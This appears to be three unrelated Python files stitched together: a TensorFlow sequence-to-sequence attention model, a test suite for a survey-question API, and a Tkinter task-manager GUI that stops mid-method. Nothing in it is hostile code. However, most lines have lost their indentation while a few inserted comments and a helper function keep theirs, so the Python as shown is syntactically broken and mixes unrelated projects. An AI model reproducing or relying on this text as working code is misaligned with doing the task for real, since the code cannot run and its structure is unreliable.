# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Sequence-to-sequence model with an attention mechanism."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import random
import numpy as np
from six.moves import xrange # pylint: disable=redefined-builtin
import tensorflow as tf
from book_code.chapter_05 import data_utils
class Seq2SeqModel(object):
"""Sequence-to-sequence model with attention and for multiple buckets.
This class implements a multi-layer recurrent neural network as encoder,
and an attention-based decoder. This is the same as the model described in
this paper: http://arxiv.org/abs/1412.7449 - please look there for details,
or into the seq2seq library for complete model implementation.
  This class also allows using GRU cells in addition to LSTM cells, and
sampled softmax to handle large output vocabulary size. A single-layer
version of this model, but with bi-directional encoder, was presented in
http://arxiv.org/abs/1409.0473
and sampled softmax is described in Section 3 of the following paper.
http://arxiv.org/abs/1412.2007
"""
def __init__(self, source_vocab_size, target_vocab_size, buckets, size,
num_layers, max_gradient_norm, batch_size, learning_rate,
learning_rate_decay_factor, use_lstm=False,
num_samples=512, forward_only=False):
"""Create the model.
Args:
source_vocab_size: size of the source vocabulary.
target_vocab_size: size of the target vocabulary.
buckets: a list of pairs (I, O), where I specifies maximum input length
that will be processed in that bucket, and O specifies maximum output
length. Training instances that have inputs longer than I or outputs
longer than O will be pushed to the next bucket and padded accordingly.
We assume that the list is sorted, e.g., [(2, 4), (8, 16)].
size: number of units in each layer of the model.
num_layers: number of layers in the model.
max_gradient_norm: gradients will be clipped to maximally this norm.
batch_size: the size of the batches used during training;
the model construction is independent of batch_size, so it can be
changed after initialization if this is convenient, e.g., for decoding.
learning_rate: learning rate to start with.
learning_rate_decay_factor: decay learning rate by this much when needed.
use_lstm: if true, we use LSTM cells instead of GRU cells.
num_samples: number of samples for sampled softmax.
forward_only: if set, we do not construct the backward pass in the model.
"""
self.source_vocab_size = source_vocab_size
self.target_vocab_size = target_vocab_size
self.buckets = buckets
self.batch_size = batch_size
self.learning_rate = tf.Variable(float(learning_rate), trainable=False)
self.learning_rate_decay_op = self.learning_rate.assign(
self.learning_rate * learning_rate_decay_factor)
self.global_step = tf.Variable(0, trainable=False)
# If we use sampled softmax, we need an output projection.
output_projection = None
softmax_loss_function = None
# Sampled softmax only makes sense if we sample less than vocabulary size.
if num_samples > 0 and num_samples < self.target_vocab_size:
with tf.device("/cpu:0"):
w = tf.get_variable("proj_w", [size, self.target_vocab_size])
w_t = tf.transpose(w)
b = tf.get_variable("proj_b", [self.target_vocab_size])
output_projection = (w, b)
def sampled_loss(inputs, labels):
with tf.device("/cpu:0"):
labels = tf.reshape(labels, [-1, 1])
return tf.nn.sampled_softmax_loss(w_t, b, inputs, labels, num_samples,
self.target_vocab_size)
softmax_loss_function = sampled_loss
# Create the internal multi-layer cell for our RNN.
single_cell = tf.nn.rnn_cell.GRUCell(size)
if use_lstm:
single_cell = tf.nn.rnn_cell.BasicLSTMCell(size)
cell = single_cell
if num_layers > 1:
cell = tf.nn.rnn_cell.MultiRNNCell([single_cell] * num_layers)
# The seq2seq function: we use embedding for the input and attention.
def seq2seq_f(encoder_inputs, decoder_inputs, do_decode):
return tf.nn.seq2seq.embedding_attention_seq2seq(
encoder_inputs, decoder_inputs, cell,
num_encoder_symbols=source_vocab_size,
num_decoder_symbols=target_vocab_size,
embedding_size=size,
output_projection=output_projection,
feed_previous=do_decode)
# Feeds for inputs.
self.encoder_inputs = []
self.decoder_inputs = []
self.target_weights = []
for i in xrange(buckets[-1][0]): # Last bucket is the biggest one.
self.encoder_inputs.append(tf.placeholder(tf.int32, shape=[None],
name="encoder{0}".format(i)))
for i in xrange(buckets[-1][1] + 1):
self.decoder_inputs.append(tf.placeholder(tf.int32, shape=[None],
name="decoder{0}".format(i)))
self.target_weights.append(tf.placeholder(tf.float32, shape=[None],
name="weight{0}".format(i)))
# Our targets are decoder inputs shifted by one.
targets = [self.decoder_inputs[i + 1]
for i in xrange(len(self.decoder_inputs) - 1)]
# Training outputs and losses.
if forward_only:
self.outputs, self.losses = tf.nn.seq2seq.model_with_buckets(
self.encoder_inputs, self.decoder_inputs, targets,
self.target_weights, buckets, lambda x, y: seq2seq_f(x, y, True),
softmax_loss_function=softmax_loss_function)
# If we use output projection, we need to project outputs for decoding.
if output_projection is not None:
for b in xrange(len(buckets)):
self.outputs[b] = [
tf.matmul(output, output_projection[0]) + output_projection[1]
for output in self.outputs[b]
]
else:
self.outputs, self.losses = tf.nn.seq2seq.model_with_buckets(
self.encoder_inputs, self.decoder_inputs, targets,
self.target_weights, buckets,
lambda x, y: seq2seq_f(x, y, False),
softmax_loss_function=softmax_loss_function)
# Gradients and SGD update operation for training the model.
params = tf.trainable_variables()
if not forward_only:
self.gradient_norms = []
self.updates = []
opt = tf.train.GradientDescentOptimizer(self.learning_rate)
for b in xrange(len(buckets)):
gradients = tf.gradients(self.losses[b], params)
clipped_gradients, norm = tf.clip_by_global_norm(gradients,
max_gradient_norm)
self.gradient_norms.append(norm)
self.updates.append(opt.apply_gradients(
zip(clipped_gradients, params), global_step=self.global_step))
self.saver = tf.train.Saver(tf.all_variables())
def step(self, session, encoder_inputs, decoder_inputs, target_weights,
bucket_id, forward_only):
"""Run a step of the model feeding the given inputs.
Args:
session: tensorflow session to use.
encoder_inputs: list of numpy int vectors to feed as encoder inputs.
decoder_inputs: list of numpy int vectors to feed as decoder inputs.
target_weights: list of numpy float vectors to feed as target weights.
bucket_id: which bucket of the model to use.
forward_only: whether to do the backward step or only forward.
Returns:
A triple consisting of gradient norm (or None if we did not do backward),
average perplexity, and the outputs.
Raises:
ValueError: if length of encoder_inputs, decoder_inputs, or
target_weights disagrees with bucket size for the specified bucket_id.
"""
# Check if the sizes match.
encoder_size, decoder_size = self.buckets[bucket_id]
if len(encoder_inputs) != encoder_size:
raise ValueError("Encoder length must be equal to the one in bucket,"
" %d != %d." % (len(encoder_inputs), encoder_size))
if len(decoder_inputs) != decoder_size:
raise ValueError("Decoder length must be equal to the one in bucket,"
" %d != %d." % (len(decoder_inputs), decoder_size))
if len(target_weights) != decoder_size:
raise ValueError("Weights length must be equal to the one in bucket,"
" %d != %d." % (len(target_weights), decoder_size))
# Input feed: encoder inputs, decoder inputs, target_weights, as provided.
input_feed = {}
for l in xrange(encoder_size):
input_feed[self.encoder_inputs[l].name] = encoder_inputs[l]
for l in xrange(decoder_size):
input_feed[self.decoder_inputs[l].name] = decoder_inputs[l]
input_feed[self.target_weights[l].name] = target_weights[l]
# Since our targets are decoder inputs shifted by one, we need one more.
last_target = self.decoder_inputs[decoder_size].name
input_feed[last_target] = np.zeros([self.batch_size], dtype=np.int32)
# Output feed: depends on whether we do a backward step or not.
if not forward_only:
output_feed = [self.updates[bucket_id], # Update Op that does SGD.
self.gradient_norms[bucket_id], # Gradient norm.
self.losses[bucket_id]] # Loss for this batch.
else:
output_feed = [self.losses[bucket_id]] # Loss for this batch.
for l in xrange(decoder_size): # Output logits.
output_feed.append(self.outputs[bucket_id][l])
outputs = session.run(output_feed, input_feed)
if not forward_only:
return outputs[1], outputs[2], None # Gradient norm, loss, no outputs.
else:
return None, outputs[0], outputs[1:] # No gradient norm, loss, outputs.
def get_batch(self, data, bucket_id):
"""Get a random batch of data from the specified bucket, prepare for step.
To feed data in step(..) it must be a list of batch-major vectors, while
data here contains single length-major cases. So the main logic of this
function is to re-index data cases to be in the proper format for feeding.
Args:
data: a tuple of size len(self.buckets) in which each element contains
lists of pairs of input and output data that we use to create a batch.
bucket_id: integer, which bucket to get the batch for.
Returns:
The triple (encoder_inputs, decoder_inputs, target_weights) for
the constructed batch that has the proper format to call step(...) later.
"""
encoder_size, decoder_size = self.buckets[bucket_id]
encoder_inputs, decoder_inputs = [], []
# Get a random batch of encoder and decoder inputs from data,
# pad them if needed, reverse encoder inputs and add GO to decoder.
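    # Illustrative example (added for clarity; assumes, as in the standard
    # translate data_utils, that PAD_ID == 0 and GO_ID == 1): with bucket
    # sizes (4, 4), the pair encoder_input=[5, 7], decoder_input=[8, 9]
    # becomes encoder [0, 0, 7, 5] (padded then reversed) and decoder
    # [1, 8, 9, 0] (GO, tokens, then PAD up to length 4).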
for _ in xrange(self.batch_size):
encoder_input, decoder_input = random.choice(data[bucket_id])
# Encoder inputs are padded and then reversed.
encoder_pad = [data_utils.PAD_ID] * (encoder_size - len(encoder_input))
encoder_inputs.append(list(reversed(encoder_input + encoder_pad)))
# Decoder inputs get an extra "GO" symbol, and are padded then.
decoder_pad_size = decoder_size - len(decoder_input) - 1
decoder_inputs.append([data_utils.GO_ID] + decoder_input +
[data_utils.PAD_ID] * decoder_pad_size)
# Now we create batch-major vectors from the data selected above.
batch_encoder_inputs, batch_decoder_inputs, batch_weights = [], [], []
# Batch encoder inputs are just re-indexed encoder_inputs.
for length_idx in xrange(encoder_size):
batch_encoder_inputs.append(
np.array([encoder_inputs[batch_idx][length_idx]
for batch_idx in xrange(self.batch_size)], dtype=np.int32))
# Batch decoder inputs are re-indexed decoder_inputs, we create weights.
for length_idx in xrange(decoder_size):
batch_decoder_inputs.append(
np.array([decoder_inputs[batch_idx][length_idx]
for batch_idx in xrange(self.batch_size)], dtype=np.int32))
# Create target_weights to be 0 for targets that are padding.
batch_weight = np.ones(self.batch_size, dtype=np.float32)
for batch_idx in xrange(self.batch_size):
# We set weight to 0 if the corresponding target is a PAD symbol.
# The corresponding target is decoder_input shifted by 1 forward.
if length_idx < decoder_size - 1:
target = decoder_inputs[batch_idx][length_idx + 1]
if length_idx == decoder_size - 1 or target == data_utils.PAD_ID:
batch_weight[batch_idx] = 0.0
batch_weights.append(batch_weight)
return batch_encoder_inputs, batch_decoder_inputs, batch_weights
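# ---------------------------------------------------------------------------
# Illustrative usage sketch (added for clarity; not part of the original
# model code). It mirrors the training loop typically used with this class in
# the canonical TensorFlow translate example; `session`, `model`, `train_set`
# and `bucket_id` are assumed to be supplied by the caller.
def _example_train_step(session, model, train_set, bucket_id):
    """Run one illustrative training step on a randomly sampled batch."""
    encoder_inputs, decoder_inputs, target_weights = model.get_batch(
        train_set, bucket_id)
    # forward_only=False evaluates the loss and applies one SGD update using
    # the update ops built in __init__.
    gradient_norm, loss, _ = model.step(
        session, encoder_inputs, decoder_inputs, target_weights,
        bucket_id, forward_only=False)
    return gradient_norm, loss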
|
|
import uuid
from unicore.ask.service.tests import DBTestCase
from unicore.ask.service.models import QuestionOption, Question
class QuestionApiTestCase(DBTestCase):
def create_question_option(self, session=None, **attrs):
return self.create_model_object(QuestionOption, session, **attrs)
def create_question(self, session=None, **attrs):
return self.create_model_object(Question, session, **attrs)
def setUp(self):
super(QuestionApiTestCase, self).setUp()
self.question_1 = self.create_question(
self.db, title='What is your name', short_name='name',
question_type='free_text', author_uuid=uuid.uuid4(),
app_uuid=uuid.uuid4(), content_uuid=uuid.uuid4(),
content_type='page', options=[],
locale='eng_GB')
self.db.flush()
self.question_1_option = self.create_question_option(
self.db, question_id=self.question_1.uuid)
self.question_2 = self.create_question(
self.db, title='What is your age', short_name='age',
question_type='multiple_choice', author_uuid=uuid.uuid4(),
app_uuid=uuid.uuid4(), content_uuid=uuid.uuid4(),
content_type='page', options=[],
locale='eng_GB')
self.db.flush()
self.age_less_than_18 = self.create_question_option(
self.db, title='<18', question_id=self.question_2.uuid)
self.age_18_to_29 = self.create_question_option(
self.db, title='18-29', question_id=self.question_2.uuid)
self.age_30_to_49 = self.create_question_option(
self.db, title='30-49', question_id=self.question_2.uuid)
self.age_over_50 = self.create_question_option(
self.db, title='50+', question_id=self.question_2.uuid)
self.question_3 = self.create_question(
self.db, title='Which sports do you watch', short_name='sports',
multiple=True, question_type='multiple_choice',
author_uuid=uuid.uuid4(), app_uuid=uuid.uuid4(),
content_uuid=uuid.uuid4(),
content_type='page', options=[],
locale='eng_GB')
self.db.flush()
self.create_question_option(
self.db, title='cricket', question_id=self.question_3.uuid)
self.create_question_option(
self.db, title='rugby', question_id=self.question_3.uuid)
self.create_question_option(
self.db, title='soccer', question_id=self.question_3.uuid)
self.create_question_option(
self.db, title='tennis', question_id=self.question_3.uuid)
self.create_question_option(
self.db, title='other', question_id=self.question_3.uuid)
self.question_4 = self.create_question(
self.db, title='Which country is the best', short_name='country',
multiple=True, question_type='multiple_choice',
author_uuid=uuid.uuid4(), app_uuid=uuid.uuid4(),
content_uuid=uuid.uuid4(),
content_type='page', options=[],
locale='eng_GB')
self.db.flush()
self.country_usa = self.create_question_option(
self.db, title='USA', question_id=self.question_4.uuid)
self.country_canada = self.create_question_option(
self.db, title='Canada', question_id=self.question_4.uuid)
self.country_brazil = self.create_question_option(
self.db, title='Brazil', question_id=self.question_4.uuid)
self.country_kenya = self.create_question_option(
self.db, title='Kenya', question_id=self.question_4.uuid)
self.country_ireland = self.create_question_option(
self.db, title='Ireland', question_id=self.question_4.uuid)
self.db.flush()
self.question_5 = self.create_question(
self.db, title='How old are you', short_name='age',
question_type='free_text', numeric=True, author_uuid=uuid.uuid4(),
app_uuid=uuid.uuid4(), content_uuid=uuid.uuid4(),
content_type='page', options=[],
locale='eng_GB')
self.db.flush()
self.question_5_option = self.create_question_option(
self.db, question_id=self.question_5.uuid)
self.db.flush()
self.db.commit()
def test_uuid(self):
the_uuid = self.question_1._uuid
self.assertEqual(the_uuid, uuid.UUID(self.question_1.uuid))
self.question_1.uuid = self.question_1.uuid
self.assertEqual(the_uuid, self.question_1._uuid)
self.question_1.uuid = uuid.UUID(self.question_1.uuid)
self.assertEqual(the_uuid, self.question_1._uuid)
def test_question_not_found(self):
self.app.get('/questions/%s' % uuid.uuid4(), status=404)
def test_free_text_question(self):
resp = self.app.get(
'/questions/%s' % self.question_1.uuid)
self.assertEqual(resp.status_int, 200)
self.assertEqual(resp.json_body, self.question_1.to_dict())
def test_multiple_choice_question(self):
resp = self.app.get(
'/questions/%s' % self.question_2.uuid)
self.assertEqual(resp.status_int, 200)
self.assertEqual(resp.json_body, self.question_2.to_dict())
def test_multiple_choice_question_with_multiple_response(self):
resp = self.app.get(
'/questions/%s' % self.question_3.uuid)
self.assertEqual(resp.status_int, 200)
self.assertEqual(resp.json_body, self.question_3.to_dict())
def test_edit_title(self):
resp = self.app.put_json(
'/questions/%s' % self.question_1.uuid,
params={
'title': 'What is your name?',
'question_type': 'free_text',
'content_type': 'page',
'locale': 'eng_GB',
'app_uuid': uuid.uuid4().hex,
'author_uuid': uuid.uuid4().hex,
'content_uuid': uuid.uuid4().hex,
})
self.assertEqual(resp.status_int, 200)
self.assertEqual(resp.json_body['title'], 'What is your name?')
# test get also returns same data
resp = self.app.get('/questions/%s' % self.question_1.uuid)
self.assertEqual(resp.json_body['title'], 'What is your name?')
def test_invalid_locale_code(self):
resp = self.app.put_json(
'/questions/%s' % self.question_1.uuid,
params={
'title': 'What is your name?',
'question_type': 'free_text',
'content_type': 'page',
'locale': 'unknown',
'app_uuid': uuid.uuid4().hex,
'author_uuid': uuid.uuid4().hex,
'content_uuid': uuid.uuid4().hex,
}, status=400)
self.assertEqual(
resp.json_body['errors'][0]['description'],
"unknown is not a valid locale")
def test_edit_multiple_choice_existing_options(self):
data = {
'title': 'What is your age sir?',
'short_name': 'age',
'question_type': 'multiple_choice',
'content_type': 'page',
'locale': 'eng_GB',
'multiple': False,
'app_uuid': uuid.uuid4().hex,
'author_uuid': uuid.uuid4().hex,
'content_uuid': uuid.uuid4().hex,
'options': [
{'uuid': self.age_less_than_18.uuid, 'title': 'less than 18'},
{'uuid': self.age_18_to_29.uuid, 'title': 'between 18 and 29'},
{'uuid': self.age_30_to_49.uuid, 'title': 'between 30 and 49'},
{'uuid': self.age_over_50.uuid, 'title': 'older than 50'}
]}
resp = self.app.put_json(
'/questions/%s' % self.question_2.uuid, params=data)
self.assertEqual(resp.status_int, 200)
self.assertEqual(resp.json_body['title'], data['title'])
self.assertEqual(resp.json_body['short_name'], data['short_name'])
self.assertEqual(resp.json_body['multiple'], data['multiple'])
self.assertEqual(
resp.json_body['options'][0]['title'], data['options'][0]['title'])
self.assertEqual(
resp.json_body['options'][1]['title'], data['options'][1]['title'])
self.assertEqual(
resp.json_body['options'][2]['title'], data['options'][2]['title'])
self.assertEqual(
resp.json_body['options'][3]['title'], data['options'][3]['title'])
# test get also returns same data
resp = self.app.get('/questions/%s' % self.question_2.uuid)
self.assertEqual(resp.json_body['title'], data['title'])
self.assertEqual(resp.json_body['short_name'], data['short_name'])
self.assertEqual(resp.json_body['multiple'], data['multiple'])
self.assertEqual(
resp.json_body['options'][0]['title'], data['options'][0]['title'])
self.assertEqual(
resp.json_body['options'][1]['title'], data['options'][1]['title'])
self.assertEqual(
resp.json_body['options'][2]['title'], data['options'][2]['title'])
self.assertEqual(
resp.json_body['options'][3]['title'], data['options'][3]['title'])
def test_edit_multiple_choice_add_new_options(self):
data = {
'title': 'What is your age sir?',
'short_name': 'age',
'question_type': 'multiple_choice',
'content_type': 'page',
'locale': 'eng_GB',
'multiple': False,
'app_uuid': uuid.uuid4().hex,
'author_uuid': uuid.uuid4().hex,
'content_uuid': uuid.uuid4().hex,
'options': [
{'uuid': self.age_less_than_18.uuid, 'title': 'less than 18'},
{'uuid': self.age_18_to_29.uuid, 'title': 'between 18 and 29'},
{'uuid': self.age_30_to_49.uuid, 'title': 'between 30 and 49'},
{'uuid': self.age_over_50.uuid, 'title': 'between 50 and 59'},
{'title': 'between 50 and 59', 'short_name': 'between_50_59'},
{'title': 'older than 60', 'short_name': 'older_than_60'},
]}
resp = self.app.put_json(
'/questions/%s' % self.question_2.uuid, params=data)
self.assertEqual(resp.status_int, 200)
self.assertEqual(
resp.json_body['options'][0]['title'], data['options'][0]['title'])
self.assertEqual(
resp.json_body['options'][1]['title'], data['options'][1]['title'])
self.assertEqual(
resp.json_body['options'][2]['title'], data['options'][2]['title'])
self.assertEqual(
resp.json_body['options'][3]['title'], data['options'][3]['title'])
self.assertEqual(
resp.json_body['options'][4]['title'], data['options'][4]['title'])
self.assertEqual(
resp.json_body['options'][5]['title'], data['options'][5]['title'])
# test get also returns same data
resp = self.app.get('/questions/%s' % self.question_2.uuid)
self.assertEqual(
resp.json_body['options'][0]['title'], data['options'][0]['title'])
self.assertEqual(
resp.json_body['options'][1]['title'], data['options'][1]['title'])
self.assertEqual(
resp.json_body['options'][2]['title'], data['options'][2]['title'])
self.assertEqual(
resp.json_body['options'][3]['title'], data['options'][3]['title'])
self.assertEqual(
resp.json_body['options'][4]['title'], data['options'][4]['title'])
self.assertEqual(
resp.json_body['options'][5]['title'], data['options'][5]['title'])
def test_edit_multiple_choice_invalid_option_uuid(self):
data = {
'title': 'What is your age sir?',
'short_name': 'age',
'question_type': 'multiple_choice',
'content_type': 'page',
'locale': 'eng_GB',
'multiple': False,
'app_uuid': uuid.uuid4().hex,
'author_uuid': uuid.uuid4().hex,
'content_uuid': uuid.uuid4().hex,
'options': [
{'uuid': self.age_less_than_18.uuid, 'title': 'less than 18'},
{'uuid': self.age_18_to_29.uuid, 'title': 'between 18 and 29'},
{'uuid': self.age_30_to_49.uuid, 'title': 'between 30 and 49'},
{'uuid': self.age_over_50.uuid, 'title': 'between 50 and 59'},
{'uuid': 'invaliduuid', 'title': 'between 50 and 59'},
]}
resp = self.app.put_json(
'/questions/%s' % self.question_2.uuid, params=data, status=400)
self.assertEqual(
resp.json_body['errors'][0]['description'],
'Shorter than minimum length 32')
data = {
'title': 'What is your age sir?',
'short_name': 'age',
'question_type': 'multiple_choice',
'content_type': 'page',
'locale': 'eng_GB',
'multiple': False,
'app_uuid': uuid.uuid4().hex,
'author_uuid': uuid.uuid4().hex,
'content_uuid': uuid.uuid4().hex,
'options': [
{'uuid': self.age_less_than_18.uuid, 'title': 'less than 18'},
{'uuid': self.age_18_to_29.uuid, 'title': 'between 18 and 29'},
{'uuid': self.age_30_to_49.uuid, 'title': 'between 30 and 49'},
{'uuid': self.age_over_50.uuid, 'title': 'between 50 and 59'},
{'uuid': 'a' * 40, 'title': 'longer than maximum uuid'},
]}
resp = self.app.put_json(
'/questions/%s' % self.question_2.uuid, params=data, status=400)
self.assertEqual(
resp.json_body['errors'][0]['description'],
'Longer than maximum length 32')
def test_create(self):
data = {
'title': 'What is your name',
'short_name': 'name',
'question_type': 'free_text',
'content_type': 'page',
'locale': 'eng_GB',
'app_uuid': uuid.uuid4().hex,
'author_uuid': uuid.uuid4().hex,
'content_uuid': uuid.uuid4().hex,
}
resp = self.app.post_json(
'/questions', params=data)
self.assertEqual(resp.status_int, 201)
self.assertEqual(resp.json_body['title'], data['title'])
self.assertEqual(resp.json_body['short_name'], data['short_name'])
self.assertEqual(
resp.json_body['question_type'], data['question_type'])
self.assertEqual(resp.json_body['options'][0]['responses_count'], 0)
self.assertEqual(resp.json_body['options'][0]['title'], data['title'])
self.assertEqual(
resp.json_body['options'][0]['short_name'], data['short_name'])
# test get also returns same data
resp = self.app.get(
'/questions/%s' % resp.json_body['uuid'])
self.assertEqual(resp.json_body['title'], data['title'])
self.assertEqual(resp.json_body['short_name'], data['short_name'])
self.assertEqual(
resp.json_body['question_type'], data['question_type'])
self.assertEqual(resp.json_body['multiple'], False)
self.assertEqual(resp.json_body['options'][0]['responses_count'], 0)
self.assertEqual(resp.json_body['options'][0]['title'], data['title'])
self.assertEqual(
resp.json_body['options'][0]['short_name'], data['short_name'])
def test_create_missing_fields(self):
resp = self.app.post_json(
'/questions', params={}, status=400)
self.assertEqual(
resp.json_body['errors'][0]['description'], 'app_uuid is missing')
self.assertEqual(
resp.json_body['errors'][1]['description'],
'author_uuid is missing')
self.assertEqual(
resp.json_body['errors'][2]['description'],
'content_uuid is missing')
self.assertEqual(
resp.json_body['errors'][3]['description'], 'title is missing')
self.assertEqual(
resp.json_body['errors'][4]['description'],
'question_type is missing')
def test_create_invalid_question_type(self):
data = {
'title': 'What is your name',
'short_name': 'name',
'question_type': 'unknown',
'content_type': 'unknown',
'app_uuid': uuid.uuid4().hex,
'author_uuid': uuid.uuid4().hex,
'content_uuid': uuid.uuid4().hex,
}
resp = self.app.post_json(
'/questions', params=data, status=400)
self.assertEqual(
resp.json_body['errors'][0]['description'],
'"unknown" is not one of free_text, multiple_choice')
def test_create_multiple_choice_invalid(self):
# No options specified
data = {
'title': 'What is your name',
'short_name': 'name',
'question_type': 'multiple_choice',
'content_type': 'page',
'locale': 'eng_GB',
'app_uuid': uuid.uuid4().hex,
'author_uuid': uuid.uuid4().hex,
'content_uuid': uuid.uuid4().hex,
}
resp = self.app.post_json(
'/questions', params=data, status=400)
self.assertEqual(
resp.json_body['errors'][0]['description'],
'Atleast 2 options are required')
# Less than 2 options specified
data = {
'title': 'What is your age',
'short_name': 'age',
'question_type': 'multiple_choice',
'content_type': 'page',
'locale': 'eng_GB',
'options': [{'title': 'very old'}],
'app_uuid': uuid.uuid4().hex,
'author_uuid': uuid.uuid4().hex,
'content_uuid': uuid.uuid4().hex,
}
resp = self.app.post_json(
'/questions', params=data, status=400)
self.assertEqual(
resp.json_body['errors'][0]['description'],
'Atleast 2 options are required')
def test_create_multiple_choice(self):
data = {
'title': 'What is your age',
'short_name': 'age',
'question_type': 'multiple_choice',
'content_type': 'page',
'locale': 'eng_GB',
'multiple': True,
'app_uuid': uuid.uuid4().hex,
'author_uuid': uuid.uuid4().hex,
'content_uuid': uuid.uuid4().hex,
'options': [
{'title': '<16', 'short_name': 'yonger_than_16'},
{'title': '16-29', 'short_name': '17_to_29'},
{'title': '30-50', 'short_name': '30_to_50'},
{'title': '>50', 'short_name': 'older_than_50'},
]}
resp = self.app.post_json('/questions', params=data, status=201)
self.assertEqual(resp.json_body['title'], data['title'])
self.assertEqual(resp.json_body['short_name'], data['short_name'])
self.assertEqual(
resp.json_body['question_type'], data['question_type'])
self.assertEqual(resp.json_body['multiple'], True)
self.assertEqual(resp.json_body['options'][0]['responses_count'], 0)
self.assertEqual(resp.json_body['options'][0]['title'], '<16')
self.assertEqual(
resp.json_body['options'][0]['short_name'], 'yonger_than_16')
self.assertEqual(len(resp.json_body['options']), 4)
# test get also returns same data
resp = self.app.get(
'/questions/%s' % resp.json_body['uuid'])
self.assertEqual(resp.json_body['title'], data['title'])
self.assertEqual(resp.json_body['short_name'], data['short_name'])
self.assertEqual(
resp.json_body['question_type'], data['question_type'])
self.assertEqual(resp.json_body['multiple'], True)
self.assertEqual(resp.json_body['options'][0]['responses_count'], 0)
self.assertEqual(resp.json_body['options'][0]['title'], '<16')
self.assertEqual(
resp.json_body['options'][0]['short_name'], 'yonger_than_16')
self.assertEqual(len(resp.json_body['options']), 4)
def test_delete_options(self):
data = {
'title': 'Which country is the best',
'short_name': 'country',
'question_type': 'multiple_choice',
'content_type': 'page',
'locale': 'eng_GB',
'multiple': True,
'app_uuid': uuid.uuid4().hex,
'author_uuid': uuid.uuid4().hex,
'content_uuid': uuid.uuid4().hex,
'options': [
{'uuid': self.country_usa.uuid, 'title': 'United States of A'},
{'uuid': self.country_canada.uuid, 'title': 'Republic of C'},
{'title': 'South Africa', 'short_name': 'rsa'},
{'title': 'Australia', 'short_name': 'australia'},
]}
resp = self.app.put_json(
'/questions/%s' % self.question_4.uuid, params=data)
options = resp.json_body['options']
self.assertEqual(resp.json_body['title'], data['title'])
self.assertEqual(resp.json_body['short_name'], data['short_name'])
self.assertEqual(options[0]['title'], 'United States of A')
self.assertEqual(options[1]['title'], 'Republic of C')
self.assertEqual(options[2]['title'], 'South Africa')
self.assertEqual(options[3]['title'], 'Australia')
self.assertEqual(len(resp.json_body['options']), 4)
# test get also returns same data
resp = self.app.get(
'/questions/%s' % resp.json_body['uuid'])
options = resp.json_body['options']
self.assertEqual(resp.json_body['title'], data['title'])
self.assertEqual(resp.json_body['short_name'], data['short_name'])
self.assertEqual(options[0]['title'], 'United States of A')
self.assertEqual(options[1]['title'], 'Republic of C')
self.assertEqual(options[2]['title'], 'South Africa')
self.assertEqual(options[3]['title'], 'Australia')
self.assertEqual(len(resp.json_body['options']), 4)
def test_numeric_free_text_question(self):
resp = self.app.get(
'/questions/%s' % self.question_5.uuid)
self.assertEqual(resp.json_body, self.question_5.to_dict())
|
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
from Tkinter import *
from ttk import Style
import platform
import tkMessageBox
if platform.system() != "Windows":
try:
import ImageTk, Image
except ImportError:
tkMessageBox.showerror('Error!', 'Python Imaging Library (PIL) is required!')
exit(1)
else:
try:
        from PIL import ImageTk, Image
except ImportError:
tkMessageBox.showerror('Error!', 'Python Imaging Library (PIL) is required!')
exit(1)
from db import *
import datetime as dt
import webbrowser
import urllib
import cStringIO
class Api(object):
"""API Setting"""
def __init__(self, api_file="api.txt"):
"""
        @param api_file An API key filename ("api.txt" by default)
"""
self.api_file = api_file
fo = open(self.api_file, "r")
self.api = StringVar()
fo.seek(0)
if fo.read(1):
fo.seek(0)
self.api.set(fo.read())
fo.close()
def set_api(self, value):
"""
Save API Key to file
@param value A user's API Key
"""
fo = open(self.api_file, "w")
fo.write(value)
fo.close()
self.api.set(value)
def get_api(self):
"""Get User's API Key"""
return self.api.get()
class Task(Frame):
"""Task card"""
def __init__(self, parent, id, title, message, task_type, datetime, window):
if datetime == '' or datetime == ' :00':
Frame.__init__(self, parent, bg="white")
self.title1 = Label(self, text=title, bg='white', justify=LEFT, wraplength=220, font="Arial 14")
self.datetime1 = Label(self, text='', bg='white', font="Arial 10")
else:
if dt.datetime.strptime(datetime, '%Y-%m-%d %H:%M:%S') > dt.datetime.now():
Frame.__init__(self, parent, bg="white")
self.title1 = Label(self, text=title, bg='white', justify=LEFT, wraplength=220, font="Arial 14")
self.datetime1 = Label(self, text=datetime, bg='white', font="Arial 10")
else:
Frame.__init__(self, parent, bg="white")
self.title1 = Label(self, text=title, bg='white', justify=LEFT, wraplength=220, font="Arial 14")
self.datetime1 = Label(self, text=datetime, bg='white', font="Arial 10", fg="red")
if task_type == 'text':
self.message1 = Label(self, text=message, bg="white", justify=LEFT, wraplength=220, font="Arial 10")
elif task_type == 'list':
message = message.split(',')
out = ''
for data in message:
out += '- ' + data + '\n'
self.message1 = Label(self, text=out, bg="white", justify=LEFT, wraplength=220, font="Arial 10")
elif task_type == "link":
self.message1 = Label(self, text=message, bg="white", fg="blue", justify=LEFT, wraplength=220, font="Arial 10")
self.message1.bind("<Button-1>", lambda event, link=message: self.open_link(event, link))
else:
web_sock = urllib.urlopen(message)
imgdata = cStringIO.StringIO(web_sock.read())
img_ori = Image.open(imgdata)
resize = img_ori.resize((250, 250), Image.ANTIALIAS)
img = ImageTk.PhotoImage(resize)
self.message1 = Label(self, image=img, bg="white", justify=LEFT, width=250)
self.message1.image = img
delete_img = ImageTk.PhotoImage(Image.open("del.png"))
edit_img = ImageTk.PhotoImage(Image.open("edit.png"))
self.id = id
self.title = title
self.message = message
self.datetime = datetime
self.task_type = task_type
self.window = window
self.delete = Label(self, image=delete_img, bg='#e74c3c', justify=LEFT)
self.delete.image = delete_img
self.edit = Label(self, image=edit_img, bg='#2ecc71', justify=LEFT)
self.edit.image = edit_img
self.delete.bind('<Button-1>', self.delete_task)
self.delete.bind("<Enter>", lambda event, h=self.delete: h.configure(bg="#B83C30"))
self.delete.bind("<Leave>", lambda event, h=self.delete: h.configure(bg="#e74c3c"))
self.edit.bind('<Button-1>', self.edit_task)
self.edit.bind("<Enter>", lambda event, h=self.edit: h.configure(bg="#25A65C"))
self.edit.bind("<Leave>", lambda event, h=self.edit: h.configure(bg="#2ecc71"))
self.delete.pack(in_=self, anchor=NE, side=RIGHT)
self.edit.pack(in_=self, anchor=NE, side=RIGHT)
self.title1.pack(in_=self, anchor=W, fill=Y)
self.message1.pack(in_=self, anchor=SW, fill=Y)
self.datetime1.pack(in_=self, anchor=SE)
def delete_task(self, e):
mysql = MySQL()
sqlite = SQLite()
if self.datetime == '':
sqlite.delete_task(self.id)
else:
